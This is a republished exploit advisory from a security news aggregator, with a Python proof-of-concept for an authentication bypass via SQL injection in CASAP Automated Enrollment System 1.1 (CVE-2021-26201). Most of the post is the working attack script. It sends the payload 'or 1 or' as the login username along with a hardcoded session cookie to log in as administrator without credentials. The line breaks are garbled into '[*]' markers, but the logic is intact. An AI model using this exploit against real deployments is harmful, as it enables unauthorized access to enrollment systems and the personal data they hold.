CASAP Automated Enrollment System 1.1 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 3rd, 2021 📆 | 3410 Views ⚑

0

CASAP Automated Enrollment System 1.1 SQL Injection ≈ Packet Storm

[*]# Exploit Title: CASAP Automated Enrollment System 1.1 -[*]Authentication Bypass cookie session[*]# Exploit Author: @nu11secur1ty[*]# Date: 03.02.2021[*]# Vendor Homepage:[*]https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html[*]# Software Link:[*]https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip[*]# Version: 1.1[*]# Tested On: Ubuntu + XAMPP 7.3.2[*]# Description: CASAP Automated Enrollment System 1.0 – Authentication[*]Bypass SQLi cookie session[*]# Exploit Link:[*]https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26201[*]# More: https://www.nu11secur1ty.com/2021/03/cve-2021-26201.html [Exploit]

import time[*]import sys[*]import requests[*]import webbrowser

# Creator of the idea: Himanshu Shukla[*]print(“Author: @nu11secur1ty”)

def authbypass(url):

#Authentication Bypass[*]s = requests.Session()[*]#Set Cookie fot testing[*]#PHPSESSID=3g6ghfl8i7qh190m4pq92fv262 #in my case from XSS attack[*]cookies = {‘PHPSESSID’: ‘inucrnag25j9h5hb826kovir0p’}

print (“[*]Attempting Authentication Bypass cookie session…”)[*]time.sleep(1)

values = {“username”:”‘or 1 or'”,”password”:””}[*]r=s.post(url+’login.php’, data=values, cookies=cookies)[*]p=s.get(url+’dashboard.php’, cookies=cookies)

#Check if Authentication was bypassed or not.[*]logged_in = True if (“true_admin” in r.text) else False[*]l=logged_in[*]if l:[*]print(“[+]Authentication Bypass Successful…!”)[*]else:[*]print(“[-]Failed cookie Authentication exploit!”)[*]print(“[-]Check Your URL”)

if __name__ == “__main__”:

if len(sys.argv)!=2:[*]print(“You Haven’t Provided any URL!”)[*]print(“Usage : python3 exploit.py “)[*]print(“Example : python3 exploit.py http://IP_or_domain/final/”)[*]exit()[*]try:[*]authbypass(sys.argv[1])[*]webbrowser.open(‘http://10.10.10.100/final/dashboard.php’)[*]except:

print(“[-]Invalid URL!”)[*]exit()

# BR @nu11secur1ty

— [*]System Administrator – Infrastructure Engineer[*]Penetration Testing Engineer[*]Exploit developer at https://www.exploit-db.com/[*]https://www.nu11secur1ty.com/[*]hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=[*]nu11secur1ty [*]

Source link

Tagged with:



Leave a Reply